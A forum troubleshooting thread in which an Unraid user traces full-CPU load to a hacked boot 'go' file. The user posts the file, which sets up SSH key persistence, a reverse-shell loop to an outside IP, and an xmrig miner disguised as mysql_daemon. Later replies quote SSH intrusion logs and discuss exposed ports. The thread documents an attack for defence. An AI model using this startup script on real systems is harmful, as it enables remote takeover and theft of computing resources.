100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto


Recommended Posts

Hi all,

 

Recently my server has been maxing out the cpu on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists.

 

Running >top in terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something?

 

Screenshot-2021-02-04-at-15-07-49.png

 

 

Screenshot-2021-02-04-at-15-11-37.png

 

Edited by JackDewhurst
Updated Title
Link to comment
  • 1 month later...
On 2/5/2021 at 3:03 PM, trurl said:

And the few plugins you have I don't think use that so I don't know why it would still be running.

 

Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below:
 

 

#!/bin/bash
# Start the Management Utility
/usr/local/sbin/emhttp &
mkdir /root/.ssh
chmod 700 /root/.ssh
cp /boot/config/ssh/authorized_keys /root/.ssh/
chmod 600 /root/.ssh/authorized_keys
nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6>
cd /dev/shm
wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li>
tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz
cd xmrig-6.7.0/
mv xmrig /usr/bin/mysql_daemon
mkdir -p /etc/mysql/conf.d
echo '{
    "autosave": true,
    "background": true,
    "cpu": {
        "enabled": true,
        "max-threads-hint": 50
    },
    "max-cpu-usage": 25,
    "cpu-priority": 1,
    "opencl": false,
    "cuda": false,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB>
            "keepalive": true,
            "tls": true
        }
    ]
}' > /etc/mysql/conf.d/.config.json
/usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B
rm -r /dev/shm/xmrig-6.7.0
rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz

 

Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..

 

Link to comment
  • JackDewhurst changed the title to 100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto
13 hours ago, JackDewhurst said:

I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr

 

Are you sure you have not opened up any inbound ports on your router or put unRaid into the DMZ?  Normally a router will block all inbound connections by default.

 

  • Thanks 1
Link to comment
  • 2 weeks later...

@JackDewhurst

On 3/17/2021 at 8:26 AM, BRiT said:

This is why no one should set up their servers to be exposed to the internet.

 

Now that we are more attuned to these sorts of things lately, I went back and looked at OP diagnostics. Here are some excerpts from syslog:

 

Feb  4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2
Feb  4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2
Feb  4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652
Feb  4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2
Feb  4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2
Feb  4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2
Feb  4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2
Feb  4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2
Feb  4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2

 

https://www.abuseipdb.com/check/109.236.89.61    Netherlands

https://www.abuseipdb.com/check/51.77.66.36    Germany

https://www.abuseipdb.com/check/192.42.116.28    Netherlands

https://www.abuseipdb.com/check/77.247.181.163    Netherlands

https://www.abuseipdb.com/check/91.192.103.34    Switzerland

https://www.abuseipdb.com/check/185.220.102.242    Netherlands

 

Link to comment
9 hours ago, jakehaas said:

My home network has no ports forwarded from outside.

Unlikely for this to have happened.  You've probably at least forwarded 32400 for Plex, but a shortcut people take when they don't understand how to forward a port is to simply place a server within a DMZ...  Alternatively, one of your clients has been hijacked

Link to comment
  • 2 weeks later...

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router.

 

my admin account password is very complex as well

Edited by docbrown
Link to comment
5 minutes ago, docbrown said:

Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router.

 

my admin account password is very complex as well

 

Sounds bad if you cannot track down where this is coming from.  I would be worried that you have some other device on your local LAN (or your router) compromised and that is the way that the someone is getting into your system.

 

The other issue is how are they getting to the flash drive to change it?    Is the flash drive shared on the network so that it can be accessed from another machine/device.  I would  recommend it is not shared on the network unless needed and definitely do not have it shared as a public share so anyone can change its content.

Link to comment
1 hour ago, docbrown said:


Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui 

 

Edit: Main tab - Flash durrr

Click on the flash drive on the Main tab

 

I've often thought to myself that it should also be listed under the Disk Shares part of the Shares tab as that is a more 'discoverable' location.

 

  • Like 1
Link to comment

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.